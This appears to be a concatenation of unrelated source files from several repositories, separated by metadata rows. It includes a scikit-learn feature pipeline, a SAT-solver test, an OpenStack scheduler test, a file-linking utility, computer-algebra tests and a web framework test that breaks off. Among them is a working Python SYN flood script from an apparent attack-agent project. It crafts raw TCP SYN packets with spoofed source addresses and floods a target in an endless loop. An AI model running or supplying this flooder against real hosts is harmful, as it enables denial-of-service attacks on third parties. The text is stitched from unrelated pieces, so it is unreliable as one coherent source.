, analyzer = 'char'
, ngram_range=self.t_ngrams_node #(2,6)
, dtype=np.float64)
node_transformer = FeatureUnion( [ #CAREFUL IF YOU CHANGE THIS - see cleanTransformers method!!!!
("text", Pipeline([
('selector', NodeTransformerTextEnclosed()),
# ('tfidf', TfidfVectorizer(lowercase=self.b_tfidf_node_lc, max_features=self.n_tfidf_node
# , analyzer = 'char', ngram_range=self.tNODE_NGRAMS #(2,6)
# , dtype=np.float64)),
('tfidf', tdifNodeTextVectorizer), #we can use it separately from the pipleline once fitted
('todense', SparseToDense()) #pystruct needs an array, not a sparse matrix
])
)
, ("textlen", Pipeline([
('selector', NodeTransformerTextLen()),
('textlen', QuantileTransformer(n_quantiles=self.n_QUANTILES, copy=False)) #use in-place scaling
])
)
, ("xywh", Pipeline([
('selector', NodeTransformerXYWH()),
#v1 ('xywh', StandardScaler(copy=False, with_mean=True, with_std=True)) #use in-place scaling
('xywh', QuantileTransformer(n_quantiles=self.n_QUANTILES, copy=False)) #use in-place scaling
])
)
, ("neighbors", Pipeline([
('selector', NodeTransformerNeighbors()),
#v1 ('neighbors', StandardScaler(copy=False, with_mean=True, with_std=True)) #use in-place scaling
('neighbors', QuantileTransformer(n_quantiles=self.n_QUANTILES, copy=False)) #use in-place scaling
])
)
])
lEdgeFeature = [ #CAREFUL IF YOU CHANGE THIS - see cleanTransformers method!!!!
("boolean", Pipeline([
('boolean', EdgeBooleanAlignmentFeatures())
])
)
, ("numerical", Pipeline([
('selector', EdgeNumericalSelector_noText()),
#v1 ('numerical', StandardScaler(copy=False, with_mean=True, with_std=True)) #use in-place scaling
('numerical', QuantileTransformer(n_quantiles=self.n_QUANTILES, copy=False)) #use in-place scaling
])
)
]
edge_transformer = FeatureUnion( lEdgeFeature )
#return _node_transformer, _edge_transformer, tdifNodeTextVectorizer
self._node_transformer = node_transformer
self._edge_transformer = edge_transformer
self.tfidfNodeTextVectorizer = None #tdifNodeTextVectorizer
def cleanTransformers(self):
"""
the TFIDF transformers are keeping the stop words => huge pickled file!!!
Here the fix is a bit rough. There are better ways....
JL
"""
self._node_transformer.transformer_list[0][1].steps[1][1].stop_words_ = None #is 1st in the union...
# if self.bMirrorPage:
# imax = 9
# else:
# imax = 7
# for i in range(3, imax):
# self._edge_transformer.transformer_list[i][1].steps[1][1].stop_words_ = None #are 3rd and 4th in the union....
return self._node_transformer, self._edge_transformer
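if __name__ == "__main__":
    # Illustrative usage sketch, not part of the original module.  The
    # parameter values are assumptions chosen for this example (500 character
    # n-gram TF-IDF features per node, n-gram range (2, 4), no lower-casing),
    # not project defaults.
    fd = FeatureDefinition_Generic(n_tfidf_node=500,
                                   t_ngrams_node=(2, 4),
                                   b_tfidf_node_lc=False)
    print(fd._node_transformer)
    print(fd._edge_transformer)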
| bsd-3-clause | -1,083,404,007,872,868,900 | 54.274194 | 156 | 0.47724 | false |
mikeberkelaar/controlleddos | Attack_Agent/attacks/syn2.py | 1 | 4434 | '''
Syn flood program in python using raw sockets (Linux)
Initial: Silver Moon (m00n.silv3r@gmail.com)
'''
# some imports
import socket, sys, random, time, Queue
from struct import *
class SYNFLOOD():
def __init__(self, Q, TARGET_IP, TARGET_PORT, RATE):
#threading.Thread.__init__(self) # Required for threaded class
self.target = TARGET_IP
self.port = TARGET_PORT
self.rate = RATE
self.instruction_q = Q
#create a raw socket
try:
self.s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
except socket.error , msg:
print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
# tell kernel not to put in headers, since we are providing it
self.s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
self.allpackets = []
# checksum functions needed for calculation checksum
def checksum(self,msg):
s = 0
# loop taking 2 characters at a time
for i in range(0, len(msg), 2):
w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
s = s + w
s = (s>>16) + (s & 0xffff);
#s = s + (s >> 16);
#complement and mask to 4 byte short
s = ~s & 0xffff
return s
def pkt(self):
# now start constructing the packet
packet = '';
# source_ip = '145.100.105.66'
source_ip = "%i.%i.%i.%i" % (10,random.randint(1,254),random.randint(1,254),random.randint(1,254))
#global dest_ip
#dest_ip = '145.100.104.173' # or socket.gethostbyname('www.google.com')
# ip header fields
ihl = 5
version = 4
tos = 0
tot_len = 20 + 20 # python seems to correctly fill the total length, dont know how ??
id = 54321 #Id of this packet
frag_off = 0
ttl = 255
protocol = socket.IPPROTO_TCP
check = 10 # python seems to correctly fill the checksum
saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to
daddr = socket.inet_aton ( self.target )
ihl_version = (version << 4) + ihl
# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s' , ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)
# tcp header fields
source = 40567 # source port
#source = random.randint(1000,40000)
dest = self.port # destination port
seq = 0
ack_seq = 0
doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
fin = 0
syn = 1
rst = 0
psh = 0
ack = 0
urg = 0
window = socket.htons (5840) # maximum allowed window size
check = 0
urg_ptr = 0
offset_res = (doff << 4) + 0
tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) + (ack << 4) + (urg << 5)
# the ! in the pack format string means network order
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)
# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(self.target)
#dest_address = socket.inet_aton(self.target)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header)
psh = pack('!4s4sBBH' , source_address , self.target , placeholder , protocol , tcp_length);
psh = psh + tcp_header;
tcp_checksum = self.checksum(psh)
# make the tcp header again and fill the correct checksum
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum , urg_ptr)
# final full packet - syn packets dont have any data
packet = ip_header + tcp_header
#Send the packet finally - the port specified has no effect
total = 0
self.allpackets.append(packet)
# print packet
def main(self):
time1 = time.time()
for i in range(10000):
self.pkt()
while 1:
i = 0 # Counter
for P in self.allpackets:
i += 1
if i == 20: # Every 20 packets -> Queue.get for possible instructions
i = 0
try:
data = self.instruction_q.get(False)
data_id = data['id']
if data[data_id]['status'] == "STOP":
break # Return to 'Listening' state / Xattacker.run()
else:
self.rate = data[data_id]['rate'] # Adjust rate
except Queue.Empty:
pass
# Although we should time out if we may be actually DDOSSING ourselfs <------------
self.s.sendto(P, (self.target , 0 )) # put this in a loop if you want to flood the target
time.sleep(float(1)/self.rate)
#print total
| apache-2.0 | -5,974,400,502,629,511,000 | 29.57931 | 118 | 0.62562 | false |
sambayless/monosat | tests/python/rnd_pb_opt.py | 1 | 2332 | from monosat import *
import functools
import math
import os
from random import shuffle
import random
import sys
import itertools
filename=None
if __name__ == "__main__":
seed = random.randint(1,100000)
if len(sys.argv)>1:
filename=sys.argv[1]
if len(sys.argv)>2:
seed=int(sys.argv[2])
Monosat().newSolver(filename)
print("begin encode");
random.seed(seed)
print("RandomSeed=" + str(seed))
#
width=4
nbvs= 15
nsubsets=8
selects = []
for n in range(nbvs):
selects.append(true() if random.random()>0.5 else false())
max_subsets=[]
min_subsets=[]
selecteds=[]
for i in range(nsubsets):
max_subset=[]
min_subset=[]
selected=[]
selecteds.append(selected)
max_subsets.append(max_subset)
min_subsets.append(min_subset)
weights = []
for v in selects:
weights.append(random.randint(-10,10))
select = Var()
selected.append(select)
max_subset.append(If(select,v,false())) #1<<width-1
#min_subset.append(If(select,Not(v),false())) #1<<width-1
weightval = sum(weights[0:len(weights)//2])
random.shuffle(weights)
AssertEqualPB(selected, weightval,weights)
maxs = []
for subset in max_subsets:
maxs.append(PopCount(subset,method="BV",return_bv=True))
#mins = []
#for subset in min_subsets:
# mins.append(PopCount(subset,method="BV",return_bv=True))
for a,b in itertools.combinations(maxs,2):
Assert(a!=b)
"""
for a,b in itertools.combinations(mins,2):
Assert(a!=b)"""
result =Solve()
print("Result is " + str(result))
if result:
print(" ".join(str(s.value()) for s in selects))
for subset in selecteds:
print(" ".join(str(s.value()) for s in subset))
print("maxs:")
for m in maxs:
print(str(m.value()))
#print("mins:")
#for m in mins:
# print(str(m.value()))
print("done")
sys.exit(10)
else:
sys.exit(20)
Monosat().setOutputFile("/tmp/test.gnf")
vars=[]
for v in range(10):
vars.append(Var())
AssertEqualPB(vars,2);
AssertLessEqPB(vars, 4)
AssertGreaterThanPB(vars, 1)
weights = list(range(10))
maximize(vars,weights)
result=Solve()
sum = 0
for i,v in enumerate(vars):
print(v.value())
if (v.value()):
sum+=weights[i]
print("Result is " + str(result))
assert(result==True)
| mit | 323,489,700,240,237,440 | 18.433333 | 65 | 0.639365 | false |
luzheqi1987/nova-annotation | nova/tests/unit/scheduler/filters/test_aggregate_instance_extra_specs_filters.py | 1 | 3135 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova.scheduler.filters import aggregate_instance_extra_specs as agg_specs
from nova import test
from nova.tests.unit.scheduler import fakes
@mock.patch('nova.db.aggregate_metadata_get_by_host')
class TestAggregateInstanceExtraSpecsFilter(test.NoDBTestCase):
def setUp(self):
super(TestAggregateInstanceExtraSpecsFilter, self).setUp()
self.filt_cls = agg_specs.AggregateInstanceExtraSpecsFilter()
def test_aggregate_filter_passes_no_extra_specs(self, agg_mock):
capabilities = {'opt1': 1, 'opt2': 2}
filter_properties = {'context': mock.sentinel.ctx, 'instance_type':
{'memory_mb': 1024}}
host = fakes.FakeHostState('host1', 'node1', capabilities)
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
self.assertFalse(agg_mock.called)
def _do_test_aggregate_filter_extra_specs(self, especs, passes):
filter_properties = {'context': mock.sentinel.ctx,
'instance_type': {'memory_mb': 1024, 'extra_specs': especs}}
host = fakes.FakeHostState('host1', 'node1',
{'free_ram_mb': 1024})
assertion = self.assertTrue if passes else self.assertFalse
assertion(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_filter_passes_extra_specs_simple(self, agg_mock):
agg_mock.return_value = {'opt1': '1', 'opt2': '2'}
especs = {
# Un-scoped extra spec
'opt1': '1',
# Scoped extra spec that applies to this filter
'aggregate_instance_extra_specs:opt2': '2',
# Scoped extra spec that does not apply to this filter
'trust:trusted_host': 'true',
}
self._do_test_aggregate_filter_extra_specs(especs, passes=True)
def test_aggregate_filter_passes_with_key_same_as_scope(self, agg_mock):
agg_mock.return_value = {'aggregate_instance_extra_specs': '1'}
especs = {
# Un-scoped extra spec, make sure we don't blow up if it
# happens to match our scope.
'aggregate_instance_extra_specs': '1',
}
self._do_test_aggregate_filter_extra_specs(especs, passes=True)
def test_aggregate_filter_fails_extra_specs_simple(self, agg_mock):
agg_mock.return_value = {'opt1': '1', 'opt2': '2'}
especs = {
'opt1': '1',
'opt2': '222',
'trust:trusted_host': 'true'
}
self._do_test_aggregate_filter_extra_specs(especs, passes=False)
| apache-2.0 | -5,408,682,348,444,999,000 | 42.541667 | 78 | 0.642743 | false |
drtuxwang/system-config | bin/flink.py | 1 | 4916 | #!/usr/bin/env python3
"""
Recursively link all files.
"""
import argparse
import glob
import os
import signal
import sys
from typing import List
import file_mod
class Options:
"""
Options class
"""
def __init__(self) -> None:
self._args: argparse.Namespace = None
self.parse(sys.argv)
def get_directories(self) -> List[str]:
"""
Return list of directories.
"""
return self._args.directories
def _parse_args(self, args: List[str]) -> None:
parser = argparse.ArgumentParser(
description='Recursively link all files.',
)
parser.add_argument(
'directories',
nargs='+',
metavar='directory',
help='Directory containing files to link.'
)
self._args = parser.parse_args(args)
for directory in self._args.directories:
if not os.path.isdir(directory):
raise SystemExit(
sys.argv[0] + ': Source directory "' + directory +
'" does not exist.'
)
if os.path.samefile(directory, os.getcwd()):
raise SystemExit(
sys.argv[0] + ': Source directory "' + directory +
'" cannot be current directory.'
)
def parse(self, args: List[str]) -> None:
"""
Parse arguments
"""
self._parse_args(args[1:])
class Main:
"""
Main class
"""
def __init__(self) -> None:
try:
self.config()
sys.exit(self.run())
except (EOFError, KeyboardInterrupt):
sys.exit(114)
except SystemExit as exception:
sys.exit(exception)
@staticmethod
def config() -> None:
"""
Configure program
"""
if hasattr(signal, 'SIGPIPE'):
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
if os.name == 'nt':
argv = []
for arg in sys.argv:
files = glob.glob(arg) # Fixes Windows globbing bug
if files:
argv.extend(files)
else:
argv.append(arg)
sys.argv = argv
def _link_files(
self,
source_dir: str,
target_dir: str,
subdir: str = '',
) -> None:
try:
source_files = sorted([
os.path.join(source_dir, x)
for x in os.listdir(source_dir)
])
except PermissionError:
return
if not os.path.isdir(target_dir):
print('Creating "' + target_dir + '" directory...')
try:
os.mkdir(target_dir)
except OSError as exception:
raise SystemExit(
sys.argv[0] + ': Cannot create "' + target_dir +
'" directory.'
) from exception
for source_file in sorted(source_files):
target_file = os.path.join(
target_dir,
os.path.basename(source_file)
)
if os.path.isdir(source_file):
self._link_files(
source_file,
target_file,
os.path.join(os.pardir, subdir)
)
else:
if os.path.islink(target_file):
print('Updating "' + target_file + '" link...')
try:
os.remove(target_file)
except OSError as exception:
raise SystemExit(
sys.argv[0] + ': Cannot remove "' + target_file +
'" link.'
) from exception
else:
print('Creating "' + target_file + '" link...')
if os.path.isabs(source_file):
file = source_file
else:
file = os.path.join(subdir, source_file)
try:
os.symlink(file, target_file)
except OSError as exception:
raise SystemExit(
sys.argv[0] + ': Cannot create "' +
target_file + '" link.'
) from exception
file_stat = file_mod.FileStat(file)
file_time = file_stat.get_time()
os.utime(
target_file,
(file_time, file_time),
follow_symlinks=False,
)
def run(self) -> int:
"""
Start program
"""
options = Options()
for directory in options.get_directories():
self._link_files(directory, '.')
return 0
if '--pydoc' in sys.argv:
help(__name__)
else:
Main()
| gpl-2.0 | 8,102,982,425,260,739,000 | 27.091429 | 77 | 0.450976 | false |
iScienceLuvr/PPP-CAS | tests/testEvaluation.py | 1 | 11865 | from ppp_cas.evaluator import evaluate
from unittest import TestCase
from sympy import latex
class TestEvaluation(TestCase):
def procedure(self, testCases):
for (expr, res) in testCases:
string, latex = evaluate(expr)
self.assertEqual(latex, res)
def testNumeric(self):
testCases = [('2/4', '\\frac{1}{2}'),
('4/2', '2'),
('Sqrt[4]', '2'),
('2^42', '4398046511104'),
('sqrt(4)', '2'),
('sqrt((42)**(pi))', '42^{\\frac{\\pi}{2}}'),
('10!', '3628800'),
]
self.procedure(testCases)
def testSimplify(self):
testCases = [('sqrt(x)**2', 'x'),
('Sqrt[x]^2', 'x'),
('x-x', '0'),
('sin(x)**2+cos(x)**2', '1'),
('(n+1)!/n!', 'n + 1'),
]
self.procedure(testCases)
def testSympyLanguage(self):
testCases = [('diff(x**2,x)', '2 x'),
('2*integrate(exp(-x**2/2), (x,(-oo,oo)))', '2 \\sqrt{2} \\sqrt{\\pi}'),
('summation(1/n**2, (n,(1,oo)))', '\\frac{\\pi^{2}}{6}'),
('(n+1)*n!-(n+1)!', '0'),
('N(GoldenRatio,100)', '1.618033988749894848204586834365638117720309179805762862135448622705260462818902449707207204189391137'),
('N(EulerGamma,100)', '0.5772156649015328606065120900824024310421593359399235988057672348848677267776646709369470632917467495'),
('Pow(1024,1/2)', '32'),
('Abs(1)', '1'),
('floor(-Pi)', '-4'),
('ceiling(-Pi)', '-3'),
('floor(Pi)', '3'),
('ceiling(Pi)', '4'),
('(a/(b+1)/c)+1/(d+1)', '\\frac{a \\left(d + 1\\right) + c \\left(b + 1\\right)}{c \\left(b + 1\\right) \\left(d + 1\\right)}'),
('diff(erf(x),x)','\\frac{2}{\\sqrt{\\pi}} e^{- x^{2}}'),
]
self.procedure(testCases)
def testMathematicaLanguage(self):
testCases = [('Integrate[Exp[-x^2/2], {x, -Infinity, Infinity}]', '\\sqrt{2} \\sqrt{\\pi}'),
('Sum[1/i^6, {i, 1, Infinity}]', '\\frac{\\pi^{6}}{945}'),
('Sum[j/i^6, {i, 1, Infinity}, {j, 0 ,m}]', '\\frac{\\pi^{6} m}{1890} \\left(m + 1\\right)'),
('Integrate[1/(x^3 + 1), x]', '\\frac{1}{3} \\log{\\left (x + 1 \\right )} - \\frac{1}{6} \\log{\\left (x^{2} - x + 1 \\right )} + \\frac{\\sqrt{3}}{3} \\operatorname{atan}{\\left (\\frac{\\sqrt{3}}{3} \\left(2 x - 1\\right) \\right )}'),
('Integrate[1/(x^3 + 1), {x, 0, 1}]', '\\frac{1}{3} \\log{\\left (2 \\right )} + \\frac{\\sqrt{3} \\pi}{9}'),
('Integrate[Sin[x*y], {x, 0, 1}, {y, 0, x}]', '- \\frac{1}{2} \\operatorname{Ci}{\\left (1 \\right )} + \\frac{\\gamma}{2}'),
('D[x^2,x]', '2 x'),
('D[x^3,x,x]', '6 x'),
('D[x^4, {x,2}]', '12 x^{2}'),
('D[x^4*Cos[y^4], {x,2}, {y,3}]', '96 x^{2} y \\left(8 y^{8} \\sin{\\left (y^{4} \\right )} - 18 y^{4} \\cos{\\left (y^{4} \\right )} - 3 \\sin{\\left (y^{4} \\right )}\\right)'),
('D[x^4*Cos[y]^z, {x,2}, y, {z,3}]', '- 12 x^{2} \\left(z \\log{\\left (\\cos{\\left (y \\right )} \\right )} + 3\\right) \\log^{2}{\\left (\\cos{\\left (y \\right )} \\right )} \\sin{\\left (y \\right )} \\cos^{z - 1}{\\left (y \\right )}'),
('Sin\'[x]', '\\cos{\\left (x \\right )}'),
('N[Pi]', '3.14159265358979'),
('N[Sqrt[2], 100]', '1.414213562373095048801688724209698078569671875376948073176679737990732478462107038850387534327641573'),
('N[GoldenRatio,100]', '1.618033988749894848204586834365638117720309179805762862135448622705260462818902449707207204189391137'),
('N[EulerGamma,100]', '0.5772156649015328606065120900824024310421593359399235988057672348848677267776646709369470632917467495'),
('N[Power[1024, 0.5]]', '32.0'),
('Log[Exp[x^n]]', '\\log{\\left (e^{x^{n}} \\right )}'),
('Log10[Exp[x^n]]', '\\frac{\\log{\\left (e^{x^{n}} \\right )}}{\\log{\\left (10 \\right )}}'),
('Log10[1000]', '3'),
('Factorial[10]', '3628800'),
('N[Factorial[3.1]/Factorial[2.1]]', '3.1'),
('Abs[1]', '1'),
('Abs[-1]', '1'),
('Abs[x]', '\\left\\lvert{x}\\right\\rvert'),
('Abs[-Pi]', '\\pi'),
('Floor[-Pi]', '-4'),
('Ceiling[-Pi]', '-3'),
('Floor[Pi]', '3'),
('Ceiling[Pi]', '4'),
('Limit[Sin[x]/x, x->0]', '1'),
('Limit[(1+x/n)^n, n->Infinity]', 'e^{x}'),
('Limit[Sum[1/i, {i, 1, n}]- Log[n], n->Infinity]', '\\gamma'),
('Solve[x^2==1, x]', '\\left [ \\left ( -1\\right ), \\quad \\left ( 1\\right )\\right ]'),
('Expand[(x+1)*(x-1)]', 'x^{2} - 1'),
('Factor[x^2+x]', 'x \\left(x + 1\\right)'),
('Prime[5]', '11'),
('PrimeQ[5]', '\\mathrm{True}'),
]
self.procedure(testCases)
def testCalchas(self):
testCases = [('3^3', '27'),
('4**4', '256'),
('12%5', '2'),
('Numeric(Pi)', '3.14159265358979'),
('eval(Sqrt(2), 100)', '1.414213562373095048801688724209698078569671875376948073176679737990732478462107038850387534327641573'),
('approx(GoldenRatio,100)', '1.618033988749894848204586834365638117720309179805762862135448622705260462818902449707207204189391137'),
('evalf(EulerGamma,100)', '0.5772156649015328606065120900824024310421593359399235988057672348848677267776646709369470632917467495'),
('power(32,2)', '1024'),
('Pow(1024,1/2)', '32'),
('Power(1024,1/2)', '32'),
('sqrt(64)', '8'),
('root(27,3)', '3'),
('N(Power(1024, 0.5))', '32.0'),
('Log10(Exp(x**n))', '\\frac{\\log{\\left (e^{x^{n}} \\right )}}{\\log{\\left (10 \\right )}}'),
('Log10(1000)', '3'),
('Lg(1000)', '3'),
('ln(exp(1))', '1'),
('Log(1000,10)', '3'),
('log(1024,2)', '10'),
('lb(1024)', '10'),
('Factorial(10)', '3628800'),
('Gamma(3/2)', '\\frac{\\sqrt{\\pi}}{2}'),
('N(Factorial(3.1)/Fact(2.1))', '3.1'),
('Abs(1)', '1'),
('Abs(-1)', '1'),
('Abs(x)', '\\left\\lvert{x}\\right\\rvert'),
('Ceiling(-Pi)', '-3'),
('Floor(-Pi)', '-4'),
('ceil(-Pi)', '-3'),
('Floor(Pi)', '3'),
('ceil(pi)', '4'),
('sgn(0)', '0'),
('Signum(-gamma)', '-1'),
('sig(Phi)', '1'),
('Sign(-e)', '-1'),
('sin(pi/3)', '\\frac{\\sqrt{3}}{2}'),
('cos(pi/3)', '\\frac{1}{2}'),
('tan(pi/3)', '\\sqrt{3}'),
('arcsin(1/2)', '\\frac{\\pi}{6}'),
('acos(1/2)', '\\frac{\\pi}{3}'),
('aTan(1)', '\\frac{\\pi}{4}'),
('C(6,4)', '15'),
('C(6,-1)', '0'),
('C(6,6)', '1'),
('C(6,7)', '0'),
('C(-1,4)', '\\mathrm{NaN}'),
('C(-1,-2)', '\\mathrm{NaN}'),
('C(-2,-1)', '\\mathrm{NaN}'),
('C(-2.5,-1.5)', '0'),
('C(1.3,3.7)', '0.0284312028601124'),
('C(3.7,1.3)', '4.43659695748368'),
('gcd(6,4)', '2'),
('lcm(n,m)hcf(n,m)', 'm n'),
('Diff(x^4*Cos(y)^z, {x,2}, y, {z,3})', '- 12 x^{2} \\left(z \\log{\\left (\\cos{\\left (y \\right )} \\right )} + 3\\right) \\log^{2}{\\left (\\cos{\\left (y \\right )} \\right )} \\sin{\\left (y \\right )} \\cos^{z - 1}{\\left (y \\right )}'),
('diff(x**2 y^3,x)', '2 x y^{3}'),
('derivate(x**2 y^3,x)', '2 x y^{3}'),
('derivative(x**2 y^3,x)', '2 x y^{3}'),
('integral(Exp(-x^2/2), x, -infinity, oo)', '\\sqrt{2} \\sqrt{\\pi}'),
('integral(Exp(-x**2/2), x, -infinity, oo)', '\\sqrt{2} \\sqrt{\\pi}'),
('sum(1/i^6, i, 1, Infty)', '\\frac{\\pi^{6}}{945}'),
('int(1/(x^3 + 1), x)', '\\frac{1}{3} \\log{\\left (x + 1 \\right )} - \\frac{1}{6} \\log{\\left (x^{2} - x + 1 \\right )} + \\frac{\\sqrt{3}}{3} \\operatorname{atan}{\\left (\\frac{\\sqrt{3}}{3} \\left(2 x - 1\\right) \\right )}'),
('Integrate(1/(x^3 + 1), x, 0, 1)', '\\frac{1}{3} \\log{\\left (2 \\right )} + \\frac{\\sqrt{3} \\pi}{9}'),
('solve(ch(x)=y,x)', '\\left [ \\left ( \\log{\\left (y - \\sqrt{y^{2} - 1} \\right )}\\right ), \\quad \\left ( \\log{\\left (y + \\sqrt{y^{2} - 1} \\right )}\\right )\\right ]'),
('solve(sinh(x)==y,x)', '\\left \\{ x : \\operatorname{asinh}{\\left (y \\right )}\\right \\}'),
('lim(sin(x)/x, x, 0)', '1'),
('limit(tan(x), x, Pi/2)', '-\\infty'),
('LimitR(tan(x), x, Pi/2)', '-\\infty'),
('Liml(tan(x), x, 1/2*Pi)', '\\infty'),
('sin(x)^2+cos(x)^2=1', '\\mathrm{True}'),
('3=4', '\\mathrm{False}'),
('2=2', '\\mathrm{True}'),
('x=y', 'x = y'),
('2f(x)b', '2 b f{\\left (x \\right )}'),
("sin'''(x)","- \\cos{\\left (x \\right )}"),
("log''(x)","- \\frac{1}{x^{2}}"),
("abs'(x)","\\frac{1}{\\left\\lvert{x}\\right\\rvert} \\left(\\Re{x} \\frac{d}{d x} \\Re{x} + \\Im{x} \\frac{d}{d x} \\Im{x}\\right)"),
("sqrt'(x)","\\frac{1}{2 \\sqrt{x}}"),
('isprime(5)','\mathrm{True}'),
('prime(5)','11'),
('x & x & x | x & y','x'),
('satisfiable(x & x & x | x & y)','\\left \\{ x : \\mathrm{True}, \\quad y : \\mathrm{True}\\right \\}'),
('satisfiable(x & ~y)','\\left \\{ x : \\mathrm{True}, \\quad y : \\mathrm{False}\\right \\}'),
('satisfiable(x & ~x)','\\mathrm{False}'),
('satisfiable(x | ~x)','\\left \\{ x : \\mathrm{False}\\right \\}'),
('D(erf(x),x)','\\frac{2}{\\sqrt{\\pi}} e^{- x^{2}}'),
]
self.procedure(testCases)
def testLatex(self):
testCases = [("\\sqrt{9}", "3"),
("\\frac{42}{1337}", "\\frac{6}{191}"),
("\\sqrt[3]{27}", "3"),
("\\sum_{i=1}^\\infty (1/i^{2})", "\\frac{\\pi^{2}}{6}"),
("\\sum_{i=1}^\\infty (1/pow(i,2))", "\\frac{\\pi^{2}}{6}"),
("\\binom{6}{4}", "15"),
("\\sqrt{x^2}", "\\sqrt{x^{2}}"),
("2\\times(1+3)", "8"),
]
self.procedure(testCases)
| mit | -2,678,843,502,815,292,400 | 60.796875 | 266 | 0.365023 | false |
kdart/pycopia | WWW/test.py | 1 | 11133 | #!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
"""
import sys
import unittest
import webbrowser
import simplejson
from cStringIO import StringIO
from datetime import datetime
from pycopia.aid import Enums, NULL
from pycopia import urlparse
from pycopia.XML import POM
from pycopia import dtds
from pycopia import table
from pycopia.WWW import fcgiserver
from pycopia.WWW import framework
from pycopia.WWW import XHTML
from pycopia.WWW import rss
from pycopia.WWW import rst
from pycopia.WWW import serverconfig
from pycopia.WWW import urllibplus
from pycopia.WWW import useragents
from pycopia.WWW import json
XHTMLFILENAME = "/tmp/testXHTML.html"
MOBILEAGENT1 = "Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1)"
MOBILEAGENT2 = 'MOT-V3/0E.41.C3R MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 UP.Link/6.3.1.17.06.3.1.17.0'
WML = "text/wml, text/vnd.wap.wml"
def _JsonTest(arg1):
return arg1
# function for dynamic content test.
def thedate():
return unicode(datetime.now())
class WWWTests(unittest.TestCase):
def test_lighttpdconfig(self):
t = serverconfig.LighttpdConfig()
t.add_vhost("www.pycopia.net", ["nmsapps"])
t.add_vhost("www.pycopia.org", ["nmsapps", "webtools"])
t.emit(sys.stdout)
def test_XHTML(self):
"""Construct an XHTML page. Verify visually."""
htd = XHTML.new_document(dtds.XHTML)
htd.title = "This is the title."
htd.add_header(1, 'Main document & "stuff"')
htd.new_para("This is a test. This is text.")
htd.add_unordered_list(["List line one.", "list line two."])
BR = htd.get_new_element("Br")
A = htd.get_new_element("A", href="somelink.html")
A.add_text("some link")
p = htd.get_para()
p.append(A)
p.add_text(" This is ")
b = p.bold("bold")
p.add_text(" text. using ")
stb = htd.get_new_element("B")
stb.add_text("bold tags")
p.text(stb)
p.add_text(" Dynamic Date: ")
p.append(XHTML.DynamicNode(thedate))
rp = str(p)
htd.append(POM.ASIS(rp))
# table methods
t = htd.add_table(border=1)
t.summary = "This is a test table."
t.caption("table caption")
h = t.set_heading(2, "heading col 2")
h.set_attribute("class", "headerclass")
t.set_heading(1, "heading col 1")
t.set_cell(1,1,"row 1, col 1")
t.set_cell(1,2,"row 2, col 1")
t.set_cell(2,1,"row 1, col 2")
t.set_cell(2,2,"row 2, col 2")
# sections
div = htd.get_section("section1")
div.add_header(1, "Div heading.")
div.new_para("First div para.")
htd.append(div)
div2 = div.get_section("section2")
div2.new_para("Second div para")
div.append(div2)
dl = div.add_definition_list()
dl.add_definitions({"def1":"The definition of 1",
"def2": "The definition of 2"})
# using the nodemaker object
NM = htd.nodemaker
ul = NM("Ul", None,
NM("Li", None, "line 1"),
NM("Li", None, "line 2"),
NM("Li", None, "Date: ", NM("code", None, thedate)), # another way to add dynamic node
)
htd.append(ul)
htd.append(NM("JS", None, 'var a = new Array(8);'))
# using the creator object.
creator = htd.creator
parts = creator([("Just", "just/"), "How will this turn out?", ["It is hard to tell.", "Well, not too hard."]])
htd.add_comment("the name attribute is required for all but submit & reset")
htd.append(parts)
f = htd.add_form(action="http://localhost:4001/cgi-bin/testing.py", method="post")
f.add_textarea("mytextarea", """Default text in the textarea.""") ; f.append(BR)
f.add_input(type="text", name="mytext", value="mytext text") ; f.append(BR)
f.add_input(type="button", name="button1", src="button.png", value="Button") ; f.append(BR)
f.add_input(type="submit", name="submit1", src="submit.png", value="Ok") ; f.append(BR)
f.add_radiobuttons("radlist", ["one", "two", "three", "four"], vertical=False) ; f.append(BR)
f.add_checkboxes("checks", ["one", "two", "three", "four"], vertical=True) ; f.append(BR)
f.add_fileinput(name="myfile", default="/etc/hosts") ; f.append(BR)
f.add_textinput(name="mytext", label="Enter text") ; f.append(BR)
f.yes_no("What's it gonna be?")
f.add_select(["one", "two", ("three", True), "four",
{"agroup": ["group1", "group2"]}],
name="myselect") ; f.append(BR)
f.add_select({"Group1": Enums("g1one", "g1two", "g1three")+[("g1four", True)],
"Group2": Enums("g2one", "g2two", "g2three"),
"Group3": Enums("g3one", "g3two", "g3three"),
